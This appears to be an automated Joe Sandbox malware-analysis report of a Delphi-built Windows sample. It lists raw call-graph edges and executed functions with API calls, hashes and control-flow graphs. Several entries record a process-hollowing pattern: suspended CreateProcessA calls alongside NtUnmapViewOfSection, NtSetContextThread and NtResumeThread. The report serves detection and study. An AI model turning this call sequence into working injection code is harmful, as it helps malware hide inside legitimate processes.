MessageBoxA 14903->14904 14905 1540d9d 11 API calls 14904->14905 14906 1556848 14905->14906 14906->14314 14934 1544a69 14907->14934 14909 1556725 14910 1556734 14909->14910 14911 1556749 14909->14911 14941 15564d9 14910->14941 14966 15449fd 14911->14966 14914 1556745 14915 1540dc1 11 API calls 14914->14915 14916 1556795 14915->14916 14916->14314 14917 1556754 14918 155676c ShellExecuteA 14917->14918 14918->14914 14920 154434d 14919->14920 14921 1540e8d 11 API calls 14920->14921 14922 1544355 14921->14922 14922->14314 14924 1558576 14923->14924 14925 1541369 11 API calls 14924->14925 14932 1558580 14925->14932 14926 1558676 14927 1541369 11 API calls 14926->14927 14928 1558684 14927->14928 14929 1540d9d 11 API calls 14928->14929 14930 1558699 14929->14930 14930->14314 14931 1540f85 11 API calls 14931->14932 14932->14926 14932->14931 14933 1541291 11 API calls 14932->14933 14933->14932 14935 1544a7c 14934->14935 14936 1544a9a 14935->14936 14939 1544a89 14935->14939 14937 1544a98 14936->14937 14938 1540d9d 11 API calls 14936->14938 14937->14909 14938->14937 14940 1541299 11 API calls 14939->14940 14940->14937 14942 1556503 14941->14942 14943 15410f9 11 API calls 14942->14943 14949 155655a 14942->14949 14944 1556544 14943->14944 14970 15442a1 14944->14970 14947 1540e35 11 API calls 14947->14949 14948 15565ad 14951 15565bb 14948->14951 14953 1556628 14948->14953 14949->14948 14950 15565a0 CreateDesktopA 14949->14950 14950->14948 14952 15565e3 CreateProcessA 14951->14952 14954 1556697 14952->14954 14959 15565f1 14952->14959 14957 1556659 CreateProcessA 14953->14957 14955 15566a2 WaitForSingleObject 14954->14955 14956 15566aa 14954->14956 14955->14956 14958 1540dc1 11 API calls 14956->14958 14957->14954 14963 1556663 14957->14963 14960 15566c4 14958->14960 14961 155661e CreateProcessA 14959->14961 14962 1540dc1 11 API calls 14960->14962 14961->14954 14964 15566d1 14962->14964 14965 155668f CreateProcessA 14963->14965 14964->14914 14965->14954 14967 1544a10 14966->14967 14968 1541299 11 API calls 14967->14968 14969 1544a21 14968->14969 14969->14917 14971 15442b0 14970->14971 14972 15442d2 14971->14972 14973 15442c9 14971->14973 14975 1541299 11 API calls 14972->14975 14974 1540d9d 11 API calls 14973->14974 14976 15442d0 14974->14976 14975->14976 14976->14947 14978 1557d92 14977->14978 14986 1557db7 14978->14986 15057 15535dd 14978->15057 14980 1540dc1 11 API calls 14981 155836a 14980->14981 14982 1540d9d 11 API calls 14981->14982 14983 1558372 14982->14983 14984 1540dc1 11 API calls 14983->14984 14985 155837f 14984->14985 14985->14377 14987 1557e9c 14986->14987 14989 1557e3e 14986->14989 15033 15581d6 14986->15033 14988 1557eb8 CreateProcessA 14987->14988 14990 1557ec6 CreateProcessA 14988->14990 14991 1557f1c 14988->14991 14993 1557e65 CreateProcessA 14989->14993 14990->14991 14994 1557ee6 14990->14994 15064 1557bb9 14991->15064 14993->14991 14996 1557e73 CreateProcessA 14993->14996 14997 1544a31 11 API calls 14994->14997 15000 1557e97 14996->15000 14996->15033 14998 1557f05 14997->14998 15004 1557f0d CreateProcessA 14998->15004 14999 1558312 15002 1558316 14999->15002 15003 1558348 GetTickCount 14999->15003 15000->14991 15006 1553a35 12 API calls 15002->15006 15003->15033 15004->14991 15004->15033 15005 1557f6d 15007 1558222 15005->15007 15008 1557f7a 15005->15008 15006->15003 15009 1553a35 12 API calls 15007->15009 15010 1557f93 15008->15010 15011 155800e 15008->15011 15013 1558254 15009->15013 15014 1553a35 12 API calls 15010->15014 15074 15579e5 15011->15074 15015 1558273 15013->15015 15016 1558259 15013->15016 15017 1557fc9 15014->15017 15019 1558292 15015->15019 15020 1558278 15015->15020 15018 1557d61 26 API calls 15016->15018 15021 1557ff0 15017->15021 15022 1557fcd 15017->15022 15018->15033 15030 15567f9 12 API calls 15019->15030 15023 1557d61 26 API calls 15020->15023 15025 15579e5 12 API calls 15021->15025 15024 15579e5 12 API calls 15022->15024 15023->15033 15027 1557feb 15024->15027 15025->15027 15026 1558049 15028 1558064 15026->15028 15029 155818b 15026->15029 15027->15026 15087 15579ad 15027->15087 15077 1557cbd 15028->15077 15034 1553a35 12 API calls 15029->15034 15030->15033 15033->14980 15036 15581bd 15034->15036 15035 155806c 15080 1557a7d 15035->15080 15038 15581c3 15036->15038 15039 15581dd 15036->15039 15042 1557d61 26 API calls 15038->15042 15040 15581e2 15039->15040 15041 15581fc 15039->15041 15043 1557d61 26 API calls 15040->15043 15045 15567f9 12 API calls 15041->15045 15042->15033 15043->15033 15044 155816f 15046 1553a35 12 API calls 15044->15046 15045->15033 15046->14999 15047 15580a1 15047->15044 15048 1553a35 12 API calls 15047->15048 15049 1558118 15048->15049 15049->15044 15050 1557a7d 12 API calls 15049->15050 15051 155813d 15050->15051 15052 1553a35 12 API calls 15051->15052 15052->15044 15054 1544112 15053->15054 15055 1541369 11 API calls 15054->15055 15056 154411d 15055->15056 15056->14351 15090 15533d9 15057->15090 15059 15535ee 15093 155328d CreateFileW 15059->15093 15061 15535f3 15104 1553711 15061->15104 15065 15579e5 12 API calls 15064->15065 15066 1557bd2 15065->15066 15066->14999 15067 1553a35 15066->15067 15068 1553a49 15067->15068 15125 1553551 15068->15125 15070 1553a8e 15071 1553a97 GetTickCount 15070->15071 15072 1540d9d 11 API calls 15071->15072 15073 1553ac8 15072->15073 15073->15005 15075 1553a35 12 API calls 15074->15075 15076 1557a37 15075->15076 15076->15027 15078 153f81d 11 API calls 15077->15078 15079 1557ce1 15078->15079 15079->15035 15081 1553a35 12 API calls 15080->15081 15082 1557ad3 15081->15082 15083 1553a35 12 API calls 15082->15083 15084 1557b15 15083->15084 15085 1557b4d 15084->15085 15086 1553a35 12 API calls 15084->15086 15085->15047 15086->15085 15129 1557951 GetModuleHandleA GetProcAddress 15087->15129 15108 15533cd GetPEB 15090->15108 15092 15533ee 15092->15059 15094 15532b5 MessageBoxA 15093->15094 15095 15532c8 GetFileSize 15093->15095 15094->15095 15096 153f81d 11 API calls 15095->15096 15097 15532dd ReadFile 15096->15097 15098 15532f6 MessageBoxA 15097->15098 15099 1553309 15097->15099 15098->15099 15100 153f81d 11 API calls 15099->15100 15102 1553326 15100->15102 15101 153f84d 11 API calls 15103 15533ad CloseHandle 15101->15103 15102->15101 15103->15061 15105 1553716 15104->15105 15109 15536ad 15105->15109 15108->15092 15114 1553601 15109->15114 15111 15536c9 15112 1540d9d 11 API calls 15111->15112 15113 15535fd 15112->15113 15113->14986 15115 1544845 4 API calls 15114->15115 15116 155360e 15115->15116 15117 155362e 15116->15117 15118 1544845 4 API calls 15116->15118 15119 1540df1 11 API calls 15117->15119 15121 155361c 15118->15121 15120 155363a 15119->15120 15120->15111 15121->15117 15122 1553620 15121->15122 15123 1540df1 11 API calls 15122->15123 15124 155362c 15123->15124 15124->15111 15126 1553561 15125->15126 15127 1540d9d 11 API calls 15126->15127 15128 15535a6 15127->15128 15128->15070 15130 1557982 15129->15130 15130->15026 15132 1557304 15131->15132 15133 1540d9d 11 API calls 15132->15133 15134 1557319 15133->15134 15154 1548621 15134->15154 15136 1557323 15157 15448e5 15136->15157 15139 1557421 15140 1540dc1 11 API calls 15139->15140 15141 155743e 15140->15141 15143 1540d9d 11 API calls 15141->15143 15142 1544151 11 API calls 15147 1557354 15142->15147 15145 1557457 15143->15145 15145->14391 15146 15573dc 15171 1544959 15146->15171 15147->15142 15147->15146 15150 15572cd 20 API calls 15147->15150 15166 1544935 FindNextFileA 15147->15166 15150->15147 15152 1540df1 11 API calls 15151->15152 15153 15574b0 15152->15153 15153->14398 15174 1548635 15154->15174 15158 1541239 15157->15158 15159 15448ff FindFirstFileA 15158->15159 15160 1544925 GetLastError 15159->15160 15161 154490f 15159->15161 15162 1544923 15160->15162 15179 1544879 15161->15179 15162->15139 15162->15147 15164 1544916 15164->15162 15165 1544959 FindClose 15164->15165 15165->15162 15167 1544952 GetLastError 15166->15167 15168 1544949 15166->15168 15167->15147 15169 1544879 4 API calls 15168->15169 15170 1544950 15169->15170 15170->15147 15172 1544964 FindClose 15171->15172 15173 1544971 15171->15173 15172->15173 15173->14391 15175 1540df1 11 API calls 15174->15175 15176 1548644 15175->15176 15177 1548630 15176->15177 15178 1541041 11 API calls 15176->15178 15177->15136 15178->15177 15180 154489c 15179->15180 15181 15448a4 FileTimeToLocalFileTime FileTimeToDosDateTime 15180->15181 15182 1544882 FindNextFileA 15180->15182 15184 15448d9 15181->15184 15182->15180 15183 1544893 GetLastError 15182->15183 15183->15184 15184->15164 15186 1540df1 11 API calls 15185->15186 15187 1559922 15186->15187 15188 1541291 11 API calls 15187->15188 15189 1559958 15187->15189 15188->15187 15189->14410 15190->14047 15192 1540adc 15191->15192 15193 1540aa6 15191->15193 15192->13945 15193->15192 15194 1542051 30 API calls 15193->15194 15195 1542bb1 42 API calls 15193->15195 15194->15193 15195->15193 15196 153f751 15197 153f766 15196->15197 15198 153f779 15196->15198 15234 153e96d RtlInitializeCriticalSection 15197->15234 15200 153f790 RtlEnterCriticalSection 15198->15200 15201 153f79a 15198->15201 15200->15201 15212 153f54d 15201->15212 15204 153f76f 15206 153f7a7 15208 153f809 15206->15208 15209 153f7ff RtlLeaveCriticalSection 15206->15209 15209->15208 15210 153f7b3 15210->15206 15241 153f375 15210->15241 15213 153f561 15212->15213 15214 153f584 15213->15214 15215 153f623 15213->15215 15217 153f593 15213->15217 15214->15206 15222 153f1c9 15214->15222 15215->15214 15220 153f6be 15215->15220 15258 153ef11 15215->15258 15266 153f015 15215->15266 15217->15214 15255 153ec59 15217->15255 15220->15214 15262 153ee19 15220->15262 15223 153f1e4 15222->15223 15224 153f1db 15222->15224 15227 153f20d RtlEnterCriticalSection 15223->15227 15228 153f217 15223->15228 15231 153f1ec 15223->15231 15225 153e96d 4 API calls 15224->15225 15226 153f1e0 15225->15226 15226->15223 15226->15231 15227->15228 15228->15231 15348 153f081 15228->15348 15231->15210 15232 153f364 15232->15210 15233 153f35a RtlLeaveCriticalSection 15233->15232 15235 153e992 RtlEnterCriticalSection 15234->15235 15236 153e99c 15234->15236 15235->15236 15237 153e9ba LocalAlloc 15236->15237 15238 153e9d4 15237->15238 15239 153ea34 15238->15239 15240 153ea2a RtlLeaveCriticalSection 15238->15240 15239->15198 15239->15204 15240->15239 15242 153f38e 15241->15242 15243 153f393 15241->15243 15244 153e96d 4 API calls 15242->15244 15245 153f3c4 RtlEnterCriticalSection 15243->15245 15246 153f3ce 15243->15246 15252 153f397 15243->15252 15244->15243 15245->15246 15247 153f47a 15246->15247 15251 153f3e4 15246->15251 15253 153f4a6 15246->15253 15250 153ef11 7 API calls 15247->15250 15247->15252 15248 153f531 RtlLeaveCriticalSection 15249 153f53b 15248->15249 15249->15206 15250->15252 15251->15248 15251->15249 15252->15206 15253->15251 15254 153ee19 7 API calls 15253->15254 15254->15251 15256 153f375 9 API calls 15255->15256 15257 153ec7a 15256->15257 15257->15214 15259 153ef23 15258->15259 15260 153ef1a 15258->15260 15259->15215 15260->15259 15261 153ec59 9 API calls 15260->15261 15261->15259 15263 153eeb4 15262->15263 15264 153ee3e 15262->15264 15263->15264 15271 153ed5d 15263->15271 15264->15214 15326 153e795 15266->15326 15268 153f02a 15269 153f037 15268->15269 15337 153ef5d 15268->15337 15269->15215 15272 153ed71 15271->15272 15273 153eda9 15272->15273 15274 153edbf 15272->15274 15283 153ee0d 15272->15283 15284 153e8d9 15273->15284 15276 153e8d9 3 API calls 15274->15276 15277 153edbd 15276->15277 15277->15283 15294 153ec1d 15277->15294 15279 153ede0 15280 153ee02 15279->15280 15299 153ec7d 15279->15299 15304 153e309 15280->15304 15283->15264 15285 153e903 15284->15285 15286 153e960 15284->15286 15308 153e631 15285->15308 15286->15277 15291 153e93b 15291->15286 15293 153e309 LocalAlloc 15291->15293 15293->15286 15295 153ec42 15294->15295 15296 153ec2f 15294->15296 15295->15279 15297 153ee19 9 API calls 15296->15297 15298 153ec3f 15297->15298 15298->15279 15300 153ec82 15299->15300 15301 153ec90 15299->15301 15302 153ec59 9 API calls 15300->15302 15301->15280 15303 153ec8f 15302->15303 15303->15280 15305 153e31b 15304->15305 15306 153e33e 15305->15306 15307 153e1f1 LocalAlloc 15305->15307 15306->15283 15307->15306 15310 153e682 15308->15310 15309 153e6e3 15312 153e281 15309->15312 15310->15309 15311 153e6b4 VirtualFree 15310->15311 15311->15310 15313 153e29c 15312->15313 15320 153e1f1 15313->15320 15316 153e4a9 15319 153e4d7 15316->15319 15317 153e54b 15317->15291 15318 153e515 VirtualFree 15318->15319 15319->15317 15319->15318 15323 153e165 15320->15323 15322 153e1ff 15322->15291 15322->15316 15324 153e173 LocalAlloc 15323->15324 15325 153e18a 15323->15325 15324->15325 15325->15322 15329 153e7b8 15326->15329 15327 153e87e 15333 153e82a 15327->15333 15344 153e571 15327->15344 15328 153e431 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 15328->15329 15329->15327 15329->15328 15330 153e281 LocalAlloc 15329->15330 15332 153e864 15329->15332 15335 153e819 15329->15335 15330->15329 15334 153e4a9 VirtualFree 15332->15334 15333->15268 15334->15333 15336 153e4a9 VirtualFree 15335->15336 15336->15333 15338 153ef11 9 API calls 15337->15338 15339 153ef71 15338->15339 15340 153e281 LocalAlloc 15339->15340 15341 153ef81 15340->15341 15342 153ec1d 9 API calls 15341->15342 15343 153ef89 15341->15343 15342->15343 15343->15269 15346 153e5c4 15344->15346 15345 153e613 15345->15333 15346->15345 15347 153e5fa VirtualAlloc 15346->15347 15347->15345 15347->15346 15351 153f098 15348->15351 15349 153f0d9 15350 153ee19 9 API calls 15349->15350 15353 153f100 15349->15353 15350->15353 15351->15349 15351->15353 15354 153efe9 15351->15354 15353->15232 15353->15233 15359 153e6ed 15354->15359 15356 153eff9 15357 153f006 15356->15357 15358 153ef5d 9 API calls 15356->15358 15357->15351 15358->15357 15362 153e70b 15359->15362 15361 153e719 15363 153e571 VirtualAlloc 15361->15363 15362->15361 15364 153e281 LocalAlloc 15362->15364 15365 153e779 15362->15365 15367 153e727 15362->15367 15368 153e3cd 15362->15368 15363->15367 15364->15362 15366 153e4a9 VirtualFree 15365->15366 15366->15367 15367->15356 15369 153e3dc VirtualAlloc 15368->15369 15371 153e409 15369->15371 15372 153e42c 15369->15372 15373 153e1f1 LocalAlloc 15371->15373 15372->15362 15374 153e415 15373->15374 15374->15372 15375 153e419 VirtualFree 15374->15375 15375->15372 15376 15535cf LdrInitializeThunk

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                Function 015422E5 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186registrystringlibraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 01542300
                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0154231E
                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0154233C
                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0154235A
                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,015423E9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 015423A3
                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,01542565,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,015423E9,?,80000001), ref: 015423C1
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,015423F0,00000000,00000000,00000005,00000000,015423E9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 015423E3
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 01542400
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0154240D
                                                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 01542413
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0154243E
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 01542493
                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 015424A3
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 015424CF
                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 015424DF
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 01542509
                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 01542519
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                                • API String ID: 1759228003-2375825460
                                                                                                                                                                                                                                • Opcode ID: 970e6a7541e99a5ec4272b10ef8025d9db8f4d7f9e263cb9da73fa3b732ff94a
                                                                                                                                                                                                                                • Instruction ID: a01431ac8e7e191ff7431f32d14711d1c9b7a5f02f8f1685e535572915ef842d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 970e6a7541e99a5ec4272b10ef8025d9db8f4d7f9e263cb9da73fa3b732ff94a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24614F71A0421E7EEB11DAE8DC46FEFB7FCEB98304F404095B645EB181D6B8DA448B60
                                                                                                                                                                                                                                Function 015423EF Relevance: 15.1, APIs: 10, Instructions: 102stringlibrarythreadCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 187 15423ef 188 15423f0-1542421 lstrcpyn GetThreadLocale GetLocaleInfoA 187->188 189 1542427-154242b 188->189 190 1542520-1542526 188->190 191 1542437-154244e lstrlen 189->191 192 154242d-1542431 189->192 193 1542453-1542459 191->193 192->190 192->191 194 1542466-154246f 193->194 195 154245b-1542464 193->195 194->190 197 1542475-154247c 194->197 195->194 196 1542450 195->196 196->193 198 154247e-15424a8 lstrcpyn LoadLibraryExA 197->198 199 15424aa-15424ac 197->199 198->199 199->190 200 15424ae-15424b2 199->200 200->190 201 15424b4-15424e8 lstrcpyn LoadLibraryExA 200->201 201->190 202 15424ea-154251e lstrcpyn LoadLibraryExA 201->202 202->190
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 01542400
                                                                                                                                                                                                                                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0154240D
                                                                                                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 01542413
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 0154243E
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 01542493
                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 015424A3
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 015424CF
                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 015424DF
                                                                                                                                                                                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 01542509
                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 01542519
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1599918012-0
                                                                                                                                                                                                                                • Opcode ID: 9761e91035f57e01ffaef065c1ac89d12249611f77cd6e926a4d7ebbac4f4515
                                                                                                                                                                                                                                • Instruction ID: 6198711cb75d6773e528559533748d653b9497bf5175b8ded32f3c977b25010f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9761e91035f57e01ffaef065c1ac89d12249611f77cd6e926a4d7ebbac4f4515
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4316471E0421A7FEB25DAE8D885FEEB7FCEB98304F404191A145EB180D6B89A448F50
                                                                                                                                                                                                                                Function 015447DD Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 398 15447dd-1544800 call 1541239 FindFirstFileA 401 1544836 398->401 402 1544802-154480f FindClose 398->402 404 154483d-1544844 401->404 402->401 403 1544811-1544834 FileTimeToLocalFileTime FileTimeToDosDateTime 402->403 403->401 403->404
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 015447F8
                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,00000000,?), ref: 01544803
                                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0154481C
                                                                                                                                                                                                                                • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0154482D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2659516521-0
                                                                                                                                                                                                                                • Opcode ID: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
                                                                                                                                                                                                                                • Instruction ID: 5c127c08d88aed6651e294a06a52abbbea07ec24377774d0372e986c3910a585
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F06872C0021D77CB20DAF98C85ACFB3BC7B08318F400392B529E6180E6309B448B50
                                                                                                                                                                                                                                Function 01557D61 Relevance: 25.0, APIs: 6, Strings: 8, Instructions: 464processCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 24 1557d61-1557db0 call 1541229 * 2 29 1557db7-1557dbe 24->29 30 1557db2 call 15535dd 24->30 32 1557dc4-1557dd2 29->32 33 155834d-155837f call 1540dc1 call 1540d9d call 1540dc1 29->33 30->29 32->33 34 1557dd8-1557ded 32->34 34->33 36 1557df3-1557e21 call 1557231 * 2 34->36 46 1557e23-1557e29 36->46 47 1557e2b 36->47 48 1557e31-1557e3c 46->48 47->48 49 1557e9c-1557ec4 call 1541239 CreateProcessA 48->49 50 1557e3e-1557e6d call 1541239 * 2 CreateProcessA 48->50 56 1557ec6-1557ee4 CreateProcessA 49->56 57 1557f1c-1557f2b call 1557bb9 49->57 50->57 62 1557e73-1557e91 CreateProcessA 50->62 56->57 60 1557ee6-1557f16 call 1544a31 call 1541239 CreateProcessA 56->60 65 1557f31-1557f74 call 1553a35 call 1557949 57->65 66 1558312-1558314 57->66 60->33 60->57 62->33 67 1557e97 62->67 77 1558222-1558257 call 1553a35 65->77 78 1557f7a-1557f91 65->78 70 1558316-1558343 call 1553a35 66->70 71 1558348 GetTickCount 66->71 67->57 70->71 71->33 86 1558273-1558276 77->86 87 1558259-155826e call 1557d61 77->87 80 1557f93-1557fcb call 1553a35 78->80 81 155800e-1558027 call 15579e5 78->81 93 1557ff0-155800c call 15579e5 80->93 94 1557fcd-1557fee call 15579e5 80->94 85 155802c 81->85 89 155802f-1558033 85->89 91 1558292-15582b3 call 1541085 call 15567f9 86->91 92 1558278-155828d call 1557d61 86->92 87->33 99 1558055-1558059 89->99 100 1558035-1558039 89->100 91->33 92->33 93->89 94->89 102 155805c-155805e 99->102 107 155804d-155804f 100->107 108 155803b-155804b call 15579ad 100->108 109 1558064-15580a3 call 1557cbd call 1557a7d 102->109 110 155818b-15581c1 call 1553a35 102->110 107->102 108->107 119 1558051-1558053 108->119 129 1558172-1558176 109->129 130 15580a9-15580b4 109->130 121 15581c3-15581d1 call 1557d61 110->121 122 15581dd-15581e0 110->122 119->102 131 15581d6-15581d8 121->131 123 15581e2-15581f7 call 1557d61 122->123 124 15581fc-155821d call 1541085 call 15567f9 122->124 123->33 124->33 134 155817c-1558186 call 15427e5 129->134 135 15582b8-155830d call 1553a35 129->135 136 15580e5-155811f call 1553a35 call 1557949 130->136 137 15580b6-15580e0 call 1557bf9 call 1557225 130->137 131->33 134->135 135->66 136->129 150 1558121-155816a call 1557a7d call 1553a35 136->150 137->136 154 155816f 150->154 154->129
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01558380), ref: 01557E66
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01558380,00000000,00000000,00000000,00000000,00000000,00000004), ref: 01557E8A
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01558380), ref: 01557EBD
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01558380,00000000,00000000,00000000,00000000,00000000,00000004), ref: 01557EDD
                                                                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01558380,00000000,00000000,00000000,00000000,00000000,00000004), ref: 01557F0F
                                                                                                                                                                                                                                  • Part of subcall function 01553A35: GetTickCount.KERNEL32 ref: 01553AAE
                                                                                                                                                                                                                                  • Part of subcall function 015567F9: MessageBoxA.USER32(00000000,00000000,01556859,00040040), ref: 0155682C
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 01558348
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateProcess$CountTick$Message
                                                                                                                                                                                                                                • String ID: execution failure, try to assign other file path$D$NtFreeVirtualMemory$NtGetContextThread$NtResumeThread$NtSetContextThread$NtTerminateProcess$NtUnmapViewOfSection
                                                                                                                                                                                                                                • API String ID: 2713535555-1661097759
